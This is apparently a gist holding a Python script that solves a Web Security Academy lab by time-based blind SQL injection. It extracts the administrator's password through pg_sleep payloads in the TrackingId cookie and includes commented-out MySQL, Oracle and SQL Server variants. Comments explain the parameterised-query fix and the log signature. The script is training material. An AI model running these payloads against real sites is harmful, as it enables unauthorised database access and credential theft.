@y0d3n
Last active July 15, 2021 16:00
import sys
import time
import requests
# Time-based blind SQL injection exercise against a Web Security Academy lab
# host. Every request carries a SQL fragment in the TrackingId cookie; the
# fragment calls pg_sleep(5) when the guessed character matches, so a response
# slower than 5 s is read as "match".
#
# Defender's view: this only works if the server concatenates the raw cookie
# value into a SQL statement (presumably the case in this lab; the server code
# is not shown here). Binding the cookie as a query parameter removes the
# injection point. In access logs the pattern is a long burst of GETs to one
# path whose TrackingId cookie contains a quote, "%3B" and SQL keywords, with
# occasional responses taking about 5 s.
url = 'https://ac401f451e11facb80e02456000600bc.web-security-academy.net/'

# Candidate characters tried, in order, for each password position.
abc = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-.$@!?}{'

# Characters recovered so far.
passwd = ''

# Positions are 1-based because SQL substring() counts from 1.
for i in range(len(passwd) + 1, 100):
    for j, guess in enumerate(abc):
        # Variants the author left disabled (other database engines / oracles):
        # mysql substring
        #cookies = dict(TrackingId="' or (SELECT SUBSTRING(password,%s,1) FROM users WHERE username='administrator')='%s" % (i, abc[j]))
        # Oracle div 0
        # cookies = dict(TrackingId="'union SELECT CASE WHEN (username ='administrator' and substr(password,%s,1)='%s') THEN to_char(1/0) ELSE NULL END FROM users--" % (i, abc[j]))
        # Microsoft substring
        # cookies = dict(TrackingId="'union select 'a' from users where username ='administrator' and substring(password,%s,1)='%s'--" % (i, abc[j]))

        # PostgreSQL sleep (the active variant). Only the statement text is
        # %-formatted; the "'" and '%3B' prefix is prepended afterwards, so the
        # literal "%3B" never passes through the format operator.
        statement = "SELECT CASE WHEN (username ='administrator' and substring(password,%s,1)='%s') THEN pg_sleep(5) ELSE NULL END from users--" % (i, guess)
        cookies = {"TrackingId": "'" + '%3B' + statement}

        # The whole round trip is timed with the wall clock.
        start = time.time()
        r = requests.get(url, cookies=cookies)
        elapsed = time.time() - start

        # Response-body checks used with the disabled variants:
        # if 'Welcome' in r.text:
        # if len(r.text) < 30:
        if elapsed > 5:
            passwd += guess
            print("\r" + passwd)
            break
    else:
        # Every candidate was tried for this position without a delayed
        # response: treat the value as complete and stop.
        print(":flag:")
        sys.exit()